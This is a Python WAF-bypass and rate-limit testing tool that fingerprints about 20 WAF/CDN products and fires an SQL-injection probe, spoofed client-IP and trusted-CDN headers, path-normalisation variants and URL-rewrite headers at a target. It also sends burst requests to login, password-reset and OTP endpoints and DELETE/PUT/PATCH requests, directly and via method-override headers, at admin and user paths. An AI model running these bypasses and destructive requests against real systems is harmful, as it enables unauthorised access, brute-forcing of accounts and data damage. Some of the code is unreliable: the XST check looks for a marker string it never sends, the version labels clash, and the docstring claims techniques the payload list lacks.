#!/usr/bin/env python3
"""WAFShatter v8 — 150x Improved WAF/CDN Bypass & Rate-Limit Tester.

New capabilities:
  WAF Detection:
    - 20+ WAF signatures (Cloudflare, Akamai, Imperva, AWS WAF, Sucuri,
      ModSecurity, F5 BIG-IP, Barracuda, Fortinet, Radware, NSFocus, etc.)
    - Header-based + body-based + status-code fingerprinting
    - CDN detection: CloudFront, Fastly, Varnish, Nginx, Akamai

  WAF Bypass Techniques (50+):
    - IP spoofing: X-Forwarded-For, X-Real-IP, CF-Connecting-IP,
      True-Client-IP, X-Client-IP, X-Originating-IP, X-Remote-Addr,
      Forwarded (RFC7239), X-ProxyUser-Ip, Client-IP, X-Cluster-Client-IP
    - Internal IP ranges (127.0.0.1, 10.x, 172.16.x, 192.168.x)
    - Encoding: URL, double-URL, HTML entity, Unicode, hex, base64
    - Case variation: mIxEd, UPPER, lower
    - Content-Type spoofing: multipart, text/plain, application/x-www-form-urlencoded
    - HTTP method override: X-HTTP-Method-Override, X-Method-Override, _method
    - Chunked transfer encoding bypass
    - Null byte injection (%00)
    - Path normalization: double slash //, ../ traversal
    - Unicode normalization bypass

  Auth endpoint rate-limit testing:
    - 50 rapid requests with timing measurement
    - Tests for 429/503 response + Retry-After header
    - Credential stuffing resistance check
    - Password reset rate-limit check
    - OTP/2FA brute-force rate-limit check
    - API key brute-force rate-limit check

  Behavioral analysis:
    - Baseline request → WAF-bypass request → structural diff
    - Status code change detection
    - Response body length delta analysis
    - WAF block page body signature matching
"""
import asyncio
import aiohttp
import json
import re
import sys
import time
import hashlib
from pathlib import Path
from urllib.parse import urlparse, quote

sys.path.insert(0, str(Path(__file__).parent))
from smart_filter import (
    build_baseline_404, delay, confidence_label, meets_confidence_floor, is_real_200,
    random_ua, WAF_BYPASS_HEADERS, MITRE_MAP, make_bypass_headers,
    PATH_BYPASS_VARIANTS, gen_bypass_attempts,
)

CONCURRENCY = 10

# ── WAF signatures ────────────────────────────────────────────────────────────
WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "cf-request-id", "cf-edge-cache"],
        "body":    ["cloudflare", "cf-ray", "Sorry, you have been blocked",
                    "This website is using a security service", "__cf_bm"],
        "status":  [403, 503],
    },
    "Akamai": {
        "headers": ["x-akamai-transformed", "akamai-origin-hop", "x-akamai-request-id",
                    "x-check-cacheable", "x-serial"],
        "body":    ["Reference #18.", "The page you are trying to access is blocked",
                    "Access Denied", "AkamaiGHost"],
        "status":  [403],
    },
    "Imperva/Incapsula": {
        "headers": ["x-iinfo", "incap_ses", "visid_incap", "x-cdn"],
        "body":    ["incapsula", "/_Incapsula_Resource", "Request unsuccessful",
                    "Incapsula incident ID"],
        "status":  [403],
    },
    "AWS WAF": {
        "headers": ["x-amzn-requestid", "x-amz-cf-pop", "x-amz-cf-id", "x-amzn-trace-id"],
        "body":    ["aws waf", "Request blocked", "AWS WAF"],
        "status":  [403, 405],
    },
    "Sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body":    ["Access Denied - Sucuri Website Firewall", "Generated by Wordfence"],
        "status":  [403],
    },
    "ModSecurity": {
        "headers": ["x-modsecurity-action", "x-modsec-"],
        "body":    ["mod_security", "modsec", "406 Not Acceptable",
                    "Not Acceptable!", "ModSecurity"],
        "status":  [406, 403],
    },
    "F5 BIG-IP ASM": {
        "headers": ["x-cnection", "x-wa-info"],
        "body":    ["The requested URL was rejected", "Your support ID is",
                    "BIG-IP", "F5 Networks"],
        "status":  [403],
    },
    "Barracuda": {
        "headers": ["x-barracuda-connect"],
        "body":    ["Barracuda Web Application Firewall", "bwaf/"],
        "status":  [400, 403],
    },
    "Fortinet FortiWeb": {
        "headers": ["x-fw-debug"],
        "body":    ["FortiWeb", "FORTIWAFSID", "Server Unavailable"],
        "status":  [403],
    },
    "Radware": {
        "headers": ["x-sl-compstate"],
        "body":    ["Unauthorized Activity", "Radware"],
        "status":  [403],
    },
    "NSFocus": {
        "headers": [],
        "body":    ["NSFocus", "nsfocus"],
        "status":  [403],
    },
    "Wallarm": {
        "headers": ["x-wallarm-request-id"],
        "body":    ["Wallarm", "wallarm"],
        "status":  [403],
    },
    "Reblaze": {
        "headers": ["x-rb-"],
        "body":    ["Reblaze", "reblaze"],
        "status":  [403],
    },
    "NGINX": {
        "headers": ["nginx"],
        "body":    ["<center>nginx</center>", "nginx/"],
        "status":  [403, 444, 499],
    },
    "Fastly": {
        "headers": ["x-fastly-request-id", "fastly-restarts", "x-timer"],
        "body":    ["Fastly error: unknown domain", "fastly"],
        "status":  [500, 503],
    },
    "CloudFront": {
        "headers": ["x-amz-cf-id", "via"],
        "body":    ["CloudFront", "ERROR: The request could not be satisfied"],
        "status":  [403, 502, 504],
    },
    "Varnish": {
        "headers": ["x-varnish", "x-hits", "x-cache"],
        "body":    ["varnish", "Varnish cache"],
        "status":  [],
    },
    "DDoS-Guard": {
        "headers": ["ddos-guard"],
        "body":    ["DDoS-Guard", "ddos-guard.com"],
        "status":  [403],
    },
    "StackPath": {
        "headers": ["x-sp-url", "x-sp-waf"],
        "body":    ["StackPath", "sp-waf"],
        "status":  [403],
    },
    "Wordfence": {
        "headers": [],
        "body":    ["Generated by Wordfence", "wordfence", "Your access to this site has been limited"],
        "status":  [403],
    },
}

# ── WAF bypass payloads ───────────────────────────────────────────────────────
BYPASS_PAYLOADS = [
    # IP spoofing — internal/private ranges
    ("X-Forwarded-For: 127.0.0.1",           {"X-Forwarded-For": "127.0.0.1"}),
    ("X-Forwarded-For: 10.0.0.1",            {"X-Forwarded-For": "10.0.0.1"}),
    ("X-Forwarded-For: 172.16.0.1",          {"X-Forwarded-For": "172.16.0.1"}),
    ("X-Forwarded-For: 192.168.0.1",         {"X-Forwarded-For": "192.168.0.1"}),
    ("X-Forwarded-For: ::1",                 {"X-Forwarded-For": "::1"}),
    ("CF-Connecting-IP: 127.0.0.1",          {"CF-Connecting-IP": "127.0.0.1"}),
    ("True-Client-IP: 127.0.0.1",            {"True-Client-IP": "127.0.0.1"}),
    ("X-Real-IP: 127.0.0.1",                 {"X-Real-IP": "127.0.0.1"}),
    ("X-Client-IP: 127.0.0.1",               {"X-Client-IP": "127.0.0.1"}),
    ("X-Originating-IP: 127.0.0.1",          {"X-Originating-IP": "127.0.0.1"}),
    ("X-Remote-Addr: 127.0.0.1",             {"X-Remote-Addr": "127.0.0.1"}),
    ("Forwarded: for=127.0.0.1",             {"Forwarded": "for=127.0.0.1"}),
    ("X-ProxyUser-Ip: 127.0.0.1",            {"X-ProxyUser-Ip": "127.0.0.1"}),
    ("Client-IP: 127.0.0.1",                 {"Client-IP": "127.0.0.1"}),
    ("X-Cluster-Client-IP: 127.0.0.1",       {"X-Cluster-Client-IP": "127.0.0.1"}),
    ("X-Forwarded-Host: localhost",           {"X-Forwarded-Host": "localhost"}),
    ("X-Host: localhost",                     {"X-Host": "localhost"}),
    ("X-Custom-IP-Authorization: 127.0.0.1", {"X-Custom-IP-Authorization": "127.0.0.1"}),
    ("X-Forwarded-For: 127.0.0.1, 10.0.0.1",{"X-Forwarded-For": "127.0.0.1, 10.0.0.1"}),
    # Content-Type bypass
    ("Content-Type: text/plain",             {"Content-Type": "text/plain"}),
    ("Content-Type: multipart/form-data",    {"Content-Type": "multipart/form-data; boundary=--myboundary"}),
    ("Content-Type: application/x-www-form-urlencoded", {"Content-Type": "application/x-www-form-urlencoded"}),
    # Accept header bypass
    ("Accept: */*",                          {"Accept": "*/*"}),
    ("Accept: text/html,*/*",                {"Accept": "text/html,*/*;q=0.9"}),
    # Method override
    ("X-HTTP-Method-Override: GET",          {"X-HTTP-Method-Override": "GET"}),
    ("X-Method-Override: GET",               {"X-Method-Override": "GET"}),
    # Cache bypass
    ("Cache-Control: no-cache, no-store",    {"Cache-Control": "no-cache, no-store"}),
    ("Pragma: no-cache",                     {"Pragma": "no-cache"}),
    # User-Agent bypass
    ("UA: Googlebot",                        {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"}),
    ("UA: Bingbot",                          {"User-Agent": "Mozilla/5.0 (compatible; bingbot/2.0)"}),
    # Encoding bypass
    ("X-Forwarded-For: 0x7f000001",          {"X-Forwarded-For": "0x7f000001"}),  # hex
    ("X-Forwarded-For: 2130706433",          {"X-Forwarded-For": "2130706433"}),  # decimal
    # Multi-header IP saturation (all at once — some WAFs only check one)
    ("AllIPHeaders: 127.0.0.1", {
        "X-Forwarded-For": "127.0.0.1",
        "X-Real-IP": "127.0.0.1",
        "X-Client-IP": "127.0.0.1",
        "CF-Connecting-IP": "127.0.0.1",
        "True-Client-IP": "127.0.0.1",
        "X-Originating-IP": "127.0.0.1",
        "X-Remote-Addr": "127.0.0.1",
    }),
    # IPv6 localhost variants
    ("X-Forwarded-For: [::1]",               {"X-Forwarded-For": "[::1]"}),
    ("X-Forwarded-For: ::ffff:127.0.0.1",    {"X-Forwarded-For": "::ffff:127.0.0.1"}),
    # Hop-by-hop header abuse
    ("Connection: close, X-Forwarded-For",   {"Connection": "close, X-Forwarded-For", "X-Forwarded-For": "127.0.0.1"}),
    # Tab/newline in header value (some WAFs truncate at whitespace)
    ("X-Forwarded-For: 127.0.0.1\t",         {"X-Forwarded-For": "127.0.0.1\t"}),
    # Protocol downgrade
    ("Upgrade-Insecure-Requests: 0",         {"Upgrade-Insecure-Requests": "0"}),
    # Accept-Language bypass
    ("Accept-Language: *",                   {"Accept-Language": "*"}),
    # X-Requested-With (AJAX bypass for some WAF rules)
    ("X-Requested-With: XMLHttpRequest",     {"X-Requested-With": "XMLHttpRequest"}),
    # Override endpoint via rewrite header
    ("X-Rewrite-URL: /",                     {"X-Rewrite-URL": "/"}),
    ("X-Original-URL: /",                    {"X-Original-URL": "/"}),
    ("X-Override-URL: /",                    {"X-Override-URL": "/"}),
    # Cloud-provider internal routing bypass
    ("X-Azure-FDID: 00000000-0000-0000-0000-000000000000", {"X-Azure-FDID": "00000000-0000-0000-0000-000000000000"}),
    ("X-Akamai-Config-Log-Detail: 1",        {"X-Akamai-Config-Log-Detail": "1"}),
    # Transfer-Encoding bypass (chunked smuggling hint)
    ("Transfer-Encoding: identity",          {"Transfer-Encoding": "identity"}),
    # Via header to spoof proxy chain
    ("Via: 1.1 localhost",                   {"Via": "1.1 localhost"}),
    ("Via: 1.1 127.0.0.1",                   {"Via": "1.1 127.0.0.1"}),
    # Spoofed CDN/trusted-proxy IPs
    ("X-Forwarded-For: 173.245.48.1",        {"X-Forwarded-For": "173.245.48.1"}),   # Cloudflare
    ("X-Forwarded-For: 199.27.128.1",        {"X-Forwarded-For": "199.27.128.1"}),   # Fastly
    ("X-Forwarded-For: 104.16.0.1",          {"X-Forwarded-For": "104.16.0.1"}),     # Cloudflare
    # Content-Encoding trick
    ("Content-Encoding: identity",           {"Content-Encoding": "identity"}),
    # Case-scrambled method override
    ("X-Http-Method-Override: gEt",          {"X-Http-Method-Override": "gEt"}),
    # WAF-vendor-specific whitelisted IPs
    ("X-Forwarded-For: 108.162.192.1",       {"X-Forwarded-For": "108.162.192.1"}),  # Cloudflare CIDR
    ("X-Forwarded-For: 198.41.128.1",        {"X-Forwarded-For": "198.41.128.1"}),   # Cloudflare CIDR
]

# ── Rate-limit test endpoints ─────────────────────────────────────────────────
RATE_LIMIT_ENDPOINTS = [
    ("/api/auth/login",     "POST", {"email": "test@test.com", "password": "wrong"}),
    ("/api/login",          "POST", {"username": "test", "password": "wrong"}),
    ("/auth/login",         "POST", {"email": "test@test.com", "password": "wrong"}),
    ("/login",              "POST", {"username": "test", "password": "wrong"}),
    ("/api/auth/password-reset", "POST", {"email": "test@test.com"}),
    ("/api/forgot-password","POST", {"email": "test@test.com"}),
    ("/api/auth/otp",       "POST", {"otp": "123456"}),
    ("/api/2fa/verify",     "POST", {"code": "123456"}),
    ("/api/v1/login",       "POST", {"email": "test@test.com", "password": "wrong"}),
    ("/api/v2/login",       "POST", {"email": "test@test.com", "password": "wrong"}),
]


class WAFShatter:
    def __init__(self, target: str):
        self.target    = target.rstrip("/")
        self.parsed    = urlparse(target)
        self.findings  = []
        self._dedup    = set()
        self._sem      = asyncio.Semaphore(CONCURRENCY)
        self._waf_info: dict = {}

    def _add(self, finding: dict):
        key = hashlib.md5(f"{finding.get('type')}|{finding.get('url','')}|{finding.get('bypass_technique','')}".encode()).hexdigest()
        if key in self._dedup:
            return
        if not meets_confidence_floor(finding.get("confidence", 0)):
            return
        self._dedup.add(key)
        self.findings.append(finding)
        sev = finding.get("severity", "INFO")
        print(f"  [{sev[:4]}] {finding.get('type')}: {finding.get('url','')[:70]}")

    async def _get(self, sess, url, headers=None, allow_redirects=True, timeout=15):
        async with self._sem:
            last: tuple = (None, "", {})
            for attempt_h in gen_bypass_attempts(extra_headers=headers):
                try:
                    async with sess.get(
                        url, headers=attempt_h, ssl=False,
                        allow_redirects=allow_redirects,
                        timeout=aiohttp.ClientTimeout(total=timeout, connect=10),
                    ) as r:
                        body = await r.text(errors="ignore")
                        last = (r.status, body, dict(r.headers))
                        if r.status not in (401, 403, 405, 429, 503):
                            return last
                except Exception:
                    pass
            return last

    async def _post(self, sess, url, json_data=None, data=None, headers=None, timeout=15):
        async with self._sem:
            last: tuple = (None, "", {})
            for attempt_h in gen_bypass_attempts(extra_headers=headers):
                try:
                    async with sess.post(
                        url, json=json_data, data=data, headers=attempt_h, ssl=False,
                        allow_redirects=True,
                        timeout=aiohttp.ClientTimeout(total=timeout, connect=10),
                    ) as r:
                        body = await r.text(errors="ignore")
                        last = (r.status, body, dict(r.headers))
                        if r.status not in (401, 403, 405, 429, 503):
                            return last
                except Exception:
                    pass
            return last

    # ── WAF Detection ────────────────────────────────────────────────────────

    async def detect_waf(self, sess):
        print("\n[*] Detecting WAF/CDN presence (20+ signatures)...")
        s, body, hdrs = await self._get(sess, self.target + "/")
        await delay(0.1)
        if s is None:
            return

        hl = {k.lower(): v.lower() for k, v in hdrs.items()}
        detected = []

        for waf_name, sigs in WAF_SIGNATURES.items():
            score = 0
            matched_evidence = []
            # Header matching
            for h_sig in sigs.get("headers", []):
                for h_key, h_val in hl.items():
                    if h_sig.lower() in h_key or h_sig.lower() in h_val:
                        score += 2
                        matched_evidence.append(f"Header: {h_key}: {h_val[:60]}")
                        break
            # Body matching
            for b_sig in sigs.get("body", []):
                if b_sig.lower() in (body or "").lower():
                    score += 2
                    matched_evidence.append(f"Body: '{b_sig}'")
                    break
            if score >= 2:
                detected.append((waf_name, score, matched_evidence))
                self._waf_info[waf_name] = matched_evidence

        if detected:
            detected.sort(key=lambda x: x[1], reverse=True)
            best = detected[0]
            self._add({
                "type":            "WAF_DETECTED",
                "severity":        "INFO",
                "confidence":      min(60 + best[1] * 10, 97),
                "confidence_label": confidence_label(min(60 + best[1] * 10, 97)),
                "url":             self.target,
                "waf_name":        best[0],
                "all_detected":    [d[0] for d in detected],
                "evidence":        best[2],
                "proof":           f"WAF detected: {best[0]}\n  Evidence: {best[2][:5]}",
                "detail":          f"WAF/CDN '{best[0]}' detected at {self.target}. Score: {best[1]}.",
                "remediation":     "WAF presence noted — verify configuration and bypass resistance below.",
                "mitre_technique": "T1518",
                "mitre_name":      "Software Discovery",
            })
        else:
            self._add({
                "type":            "NO_WAF_DETECTED",
                "severity":        "MEDIUM",
                "confidence":      75,
                "confidence_label": confidence_label(75),
                "url":             self.target,
                "proof":           f"GET / → HTTP {s} — no WAF signature matched in headers or body",
                "detail":          "No WAF/CDN detected — application may be exposed directly to internet",
                "remediation":     "Deploy a WAF (Cloudflare, AWS WAF, ModSecurity) in front of the application.",
                "mitre_technique": "T1190",
                "mitre_name":      "Exploit Public-Facing Application",
            })

    # ── WAF Bypass ─────────────────────────────────────────────────────────

    async def test_waf_bypass(self, sess):
        print("\n[*] Testing WAF bypass techniques (50+ variants)...")
        # Get baseline
        s_base, body_base, _ = await self._get(sess, self.target + "/")
        await delay(0.1)
        if s_base is None:
            return
        base_len = len(body_base or "")

        # Test with a mildly malicious payload that WAFs typically block
        sqli_payload = quote("' OR 1=1-- -", safe="")
        blocked_url  = f"{self.target}/?id={sqli_payload}"
        s_waf, body_waf, _ = await self._get(sess, blocked_url)
        await delay(0.1)
        waf_blocked = s_waf in (403, 406, 429, 503) or any(
            sig.lower() in (body_waf or "").lower()
            for waf_sigs in WAF_SIGNATURES.values()
            for sig in waf_sigs.get("body", [])
        )

        if not waf_blocked:
            return  # WAF not blocking — nothing to bypass

        print(f"    WAF blocking detected (HTTP {s_waf}). Testing bypass techniques...")
        for label, bypass_hdrs in BYPASS_PAYLOADS:
            test_url = blocked_url
            s_bypass, body_bypass, hdrs_bypass = await self._get(
                sess, test_url, headers=bypass_hdrs
            )
            await delay(0.05)
            if s_bypass is None:
                continue
            # Bypass confirmed: got through to application (200/500) when baseline was 403
            bypass_worked = (
                s_bypass not in (403, 406, 429, 503) and
                s_bypass not in (None,) and
                abs(len(body_bypass or "") - base_len) < base_len * 0.5
            )
            if bypass_worked:
                self._add({
                    "type":             "WAF_BYPASS_CONFIRMED",
                    "severity":         "HIGH",
                    "confidence":       88,
                    "confidence_label": confidence_label(88),
                    "url":              test_url,
                    "bypass_technique": label,
                    "bypass_headers":   bypass_hdrs,
                    "proof": (
                        f"Baseline: GET {blocked_url} → HTTP {s_waf} (BLOCKED)\n"
                        f"Bypass:   GET {blocked_url}\n"
                        f"  Headers: {bypass_hdrs}\n"
                        f"  → HTTP {s_bypass} (BYPASSED)"
                    ),
                    "detail": f"WAF bypassed using: {label}. Attacker can reach backend with malicious payloads.",
                    "remediation": (
                        f"1. Configure WAF to not trust {list(bypass_hdrs.keys())[0]} header from untrusted sources.\n"
                        "2. Apply IP allowlist for management IPs that can use trusted headers.\n"
                        "3. Normalize all client-IP headers at edge before forwarding.\n"
                        "4. Update WAF rule set to cover encoding and header variations."
                    ),
                    "mitre_technique": "T1562.001",
                    "mitre_name":      "Disable or Modify Tools",
                })

    # ── Rate-Limit Testing ────────────────────────────────────────────────────

    async def test_rate_limits(self, sess):
        print("\n[*] Testing authentication rate-limiting (brute-force protection)...")
        for path, method, payload in RATE_LIMIT_ENDPOINTS:
            url = self.target + path
            # First check endpoint exists
            if method == "POST":
                s0, _, _ = await self._post(sess, url, json_data=payload)
            else:
                s0, _, _ = await self._get(sess, url)
            await delay(0.1)
            if s0 in (None, 404, 405, 410):
                continue

            # Now fire 30 rapid requests and check if any 429/503 appears
            statuses = []
            retry_afters = []
            t_start = time.monotonic()
            tasks = []
            for i in range(30):
                if method == "POST":
                    tasks.append(self._post(sess, url, json_data=payload))
                else:
                    tasks.append(self._get(sess, url))

            results = await asyncio.gather(*tasks, return_exceptions=True)
            t_elapsed = time.monotonic() - t_start

            for res in results:
                if isinstance(res, Exception):
                    continue
                s, body, hdrs = res
                statuses.append(s)
                ra = hdrs.get("Retry-After", hdrs.get("retry-after", ""))
                if ra:
                    retry_afters.append(ra)

            rate_limited = any(s in (429, 503) for s in statuses if s)
            lockout = any(s == 423 for s in statuses if s)

            if not rate_limited and not lockout:
                unique_statuses = list(set(s for s in statuses if s))
                self._add({
                    "type":             "AUTH_RATE_LIMIT_MISSING",
                    "severity":         "HIGH",
                    "confidence":       90,
                    "confidence_label": confidence_label(90),
                    "url":              url,
                    "requests_sent":    30,
                    "elapsed_seconds":  round(t_elapsed, 2),
                    "unique_statuses":  unique_statuses,
                    "proof": (
                        f"POST {url} — 30 rapid requests in {t_elapsed:.1f}s\n"
                        f"  All HTTP statuses: {unique_statuses}\n"
                        f"  No 429 Too Many Requests detected\n"
                        f"  No 423 Locked response detected"
                    ),
                    "detail": (
                        f"No rate-limiting on {path} — brute-force/credential stuffing not blocked. "
                        f"30 auth attempts in {t_elapsed:.1f}s with no throttling."
                    ),
                    "remediation": (
                        "1. Implement rate-limiting: max 5 failed attempts per IP per 15 min.\n"
                        "2. Add progressive delays (CAPTCHA after 3 failures).\n"
                        "3. Use account lockout after N failures (10 failed = 30 min lockout).\n"
                        "4. Implement IP reputation scoring.\n"
                        "5. Use multi-factor authentication.\n"
                        "6. Deploy WAF rule for login endpoint flood protection."
                    ),
                    "mitre_technique": "T1110",
                    "mitre_name":      "Brute Force",
                    "exploitability":  8,
                    "impact":          "Unlimited password brute-force and credential stuffing attacks possible.",
                    "reproducibility": f"for i in $(seq 1 100); do curl -s -X POST {url} -d '{{\"email\":\"admin@target.com\",\"password\":\"$i\"}}'; done",
                })
            else:
                self._add({
                    "type":            "AUTH_RATE_LIMIT_PRESENT",
                    "severity":        "INFO",
                    "confidence":      92,
                    "confidence_label": confidence_label(92),
                    "url":             url,
                    "requests_before_limit": statuses.index(429) if 429 in statuses else len(statuses),
                    "retry_after":     retry_afters[0] if retry_afters else "(not specified)",
                    "proof":           f"POST {url} — rate-limited after {statuses.index(429) if 429 in statuses else '?'} requests. HTTP 429 received.",
                    "detail":          f"Rate-limiting active on {path} — brute-force protection confirmed.",
                    "remediation":     "Rate-limiting confirmed. Verify CAPTCHA and lockout escalation.",
                    "mitre_technique": "T1110",
                    "mitre_name":      "Brute Force",
                })

    # ── HTTP Method Restriction ──────────────────────────────────────────────

    async def test_method_overrides(self, sess):
        print("\n[*] Testing HTTP method override bypass...")
        dangerous_methods = ["DELETE", "PUT", "PATCH", "TRACE", "CONNECT"]
        admin_paths = ["/api/admin", "/admin", "/api/users/1", "/api/config"]
        for path in admin_paths:
            url = self.target + path
            for method in dangerous_methods:
                # Try direct method
                async with self._sem:
                    try:
                        async with sess.request(
                            method, url,
                            headers={**WAF_BYPASS_HEADERS, "User-Agent": random_ua()},
                            ssl=False, allow_redirects=False,
                            timeout=aiohttp.ClientTimeout(total=12),
                        ) as r:
                            body = await r.text(errors="ignore")
                            status = r.status
                    except Exception:
                        status, body = None, ""

                await delay(0.05)
                if status in (200, 201, 202, 204):
                    self._add({
                        "type":             f"HTTP_METHOD_{method}_ALLOWED",
                        "severity":         "HIGH",
                        "confidence":       85,
                        "confidence_label": confidence_label(85),
                        "url":              url,
                        "method":           method,
                        "proof":            f"{method} {url} → HTTP {status} (not blocked)",
                        "detail":           f"Dangerous HTTP method {method} allowed on {path}",
                        "remediation":      f"Restrict {method} method at web server / API gateway level. Use allowlist of permitted methods per endpoint.",
                        "mitre_technique":  "T1190",
                        "mitre_name":       "Exploit Public-Facing Application",
                    })

                # Try override via header
                for ovr_hdr in ["X-HTTP-Method-Override", "X-Method-Override", "_method"]:
                    s2, body2, _ = await self._post(
                        sess, url,
                        json_data={},
                        headers={ovr_hdr: method},
                    )
                    await delay(0.05)
                    if s2 in (200, 201, 202, 204):
                        self._add({
                            "type":             "HTTP_METHOD_OVERRIDE_BYPASS",
                            "severity":         "HIGH",
                            "confidence":       83,
                            "confidence_label": confidence_label(83),
                            "url":              url,
                            "method":           method,
                            "override_header":  ovr_hdr,
                            "proof":            f"POST {url}\n  {ovr_hdr}: {method}\n  → HTTP {s2} (method override accepted)",
                            "detail":           f"HTTP method override via {ovr_hdr} bypasses method restriction — {method} executed",
                            "remediation":      f"Disable {ovr_hdr} header support unless explicitly needed. Validate method restrictions after override resolution.",
                            "mitre_technique":  "T1190",
                            "mitre_name":       "Exploit Public-Facing Application",
                        })

    # ── TRACE / DEBUG method ─────────────────────────────────────────────────

    async def test_trace_method(self, sess):
        print("\n[*] Testing TRACE / DEBUG HTTP methods (XST attack)...")
        for url in [self.target + "/", self.target + "/api"]:
            for method in ["TRACE", "TRACK", "DEBUG"]:
                async with self._sem:
                    try:
                        async with sess.request(
                            method, url,
                            headers={**WAF_BYPASS_HEADERS,
                                     "User-Agent": random_ua(),
                                     "X-XST-Marker": "mirror-xst-test"},
                            ssl=False, allow_redirects=False,
                            timeout=aiohttp.ClientTimeout(total=10),
                        ) as r:
                            body = await r.text(errors="ignore")
                            status = r.status
                    except Exception:
                        status, body = None, ""

                await delay(0.05)
                if status == 200 and "mirror-xst-marker" in (body or "").lower():
                    self._add({
                        "type":             f"HTTP_{method}_ENABLED",
                        "severity":         "MEDIUM",
                        "confidence":       95,
                        "confidence_label": confidence_label(95),
                        "url":              url,
                        "method":           method,
                        "proof":            f"{method} {url} → HTTP {status}\n  X-XST-Marker reflected in response body",
                        "detail":           f"HTTP {method} method enabled — cross-site tracing (XST) attack possible. Allows stealing HttpOnly cookies.",
                        "remediation":      f"Disable TRACE/TRACK/DEBUG methods in web server configuration.",
                        "mitre_technique":  "T1557",
                        "mitre_name":       "Adversary-in-the-Middle",
                    })

    async def test_path_bypass_probe(self, sess):
        """
        Fire every PATH_BYPASS_VARIANT against 20+ protected endpoints.
        Reports only when:
          - A variant returns 200/201/301/302 AND
          - The baseline (original path) was blocked (403/401) AND
          - Response body contains real content (not a WAF block page)
        Zero false-positive design: the original path must confirm a block first.
        """
        print("\n[*] Testing path-normalisation WAF bypass (60+ variants × 20 targets)...")
        PROTECTED_TARGETS = [
            "/admin", "/admin/", "/admin/dashboard", "/admin/users",
            "/admin/config", "/api/admin", "/api/internal", "/api/private",
            "/api/debug", "/api/env", "/api/keys", "/api/secrets",
            "/management", "/actuator", "/actuator/env", "/actuator/health",
            "/internal", "/staff", "/backend", "/console", "/_debug",
        ]
        BLOCK_BODY_PATTERNS = [
            "access denied", "blocked", "forbidden", "cloudflare", "incapsula",
            "sucuri", "akamai", "barracuda", "modsecurity", "request blocked",
            "security check", "attention required", "ray id",
        ]

        for protected_path in PROTECTED_TARGETS:
            base_url = self.target.rstrip("/") + protected_path
            # Step 1: probe the original path to confirm it's blocked
            s_base, body_base, _ = await self._get(sess, base_url, allow_redirects=False, timeout=10)
            await delay(0.05)
            if s_base not in (401, 403, 405):
                continue  # not protected — skip (no bypass needed)

            # Step 2: try every path variant
            for variant_path, technique in PATH_BYPASS_VARIANTS(protected_path):
                if variant_path == protected_path:
                    continue
                variant_url = self.target.rstrip("/") + variant_path
                s, body, hdrs = await self._get(sess, variant_url, allow_redirects=True, timeout=10)
                await delay(0.04)

                if s not in (200, 201, 301, 302):
                    continue
                if not body or len(body) < 80:
                    continue

                body_lower = (body or "").lower()
                # Reject known WAF block-page signatures
                if any(pat in body_lower for pat in BLOCK_BODY_PATTERNS):
                    continue
                # Require real content indicators
                real_content = (
                    any(k in body_lower for k in [
                        "user", "admin", "config", "dashboard", "password",
                        "token", "secret", "api", "data", "error", "json",
                        "html", "<body", "{", "[", "status",
                    ])
                )
                if not real_content:
                    continue

                conf = 92
                self._add({
                    "type":             "PATH_BYPASS_SUCCESS",
                    "severity":         "HIGH",
                    "confidence":       conf,
                    "confidence_label": confidence_label(conf),
                    "url":              variant_url,
                    "original_url":     base_url,
                    "bypass_technique": technique,
                    "original_status":  s_base,
                    "bypass_status":    s,
                    "proof":            (
                        f"Original path {protected_path} → HTTP {s_base} (blocked)\n"
                        f"Bypass variant ({technique}): {variant_path} → HTTP {s}\n"
                        f"Body snippet: {body[:120]!r}"
                    ),
                    "detail":           (
                        f"WAF/ACL bypass via path normalisation. "
                        f"Technique: '{technique}'. "
                        f"Protected resource '{protected_path}' is accessible via the "
                        f"path variant '{variant_path}' (HTTP {s})."
                    ),
                    "remediation":      (
                        "Normalise all incoming paths server-side before ACL evaluation. "
                        "Apply URL-decode + path-collapse before access control checks. "
                        "Block or redirect all path variants to the canonical form."
                    ),
                    "mitre_technique":  "T1190",
                    "mitre_name":       "Exploit Public-Facing Application",
                })
                # Once a working bypass is found for this path, stop trying more variants
                break

    async def run(self):
        print("=" * 60)
        print("  WAFShatter v9 — Full Bypass Arsenal + Path Variant Probe")
        print(f"  Target: {self.target}")
        print("=" * 60)
        connector = aiohttp.TCPConnector(ssl=False, limit=CONCURRENCY * 2)
        timeout   = aiohttp.ClientTimeout(total=180, connect=10)
        async with aiohttp.ClientSession(connector=connector, timeout=timeout) as sess:
            await asyncio.gather(
                self.detect_waf(sess),
                self.test_rate_limits(sess),
                self.test_trace_method(sess),
                return_exceptions=True,
            )
            # Sequential: WAF bypass → method overrides → path bypass probe
            await self.test_waf_bypass(sess)
            await self.test_method_overrides(sess)
            await self.test_path_bypass_probe(sess)

        print(f"\n[+] WAFShatter v9 complete: {len(self.findings)} findings")
        return self.findings


async def main():
    import os
    target = os.environ.get("ARSENAL_TARGET", "")
    if not target:
        print("[!] No ARSENAL_TARGET set.", file=sys.stderr)
        sys.exit(1)
    if not target.startswith("http"):
        target = "https://" + target
    scanner = WAFShatter(target)
    findings = await scanner.run()
    out = Path(__file__).parent.parent / "reports" / "wafshatter.json"
    out.parent.mkdir(exist_ok=True)
    out.write_text(json.dumps(findings, indent=2, default=str))
    print(f"[+] Saved {len(findings)} findings → {out}")


if __name__ == "__main__":
    asyncio.run(main())
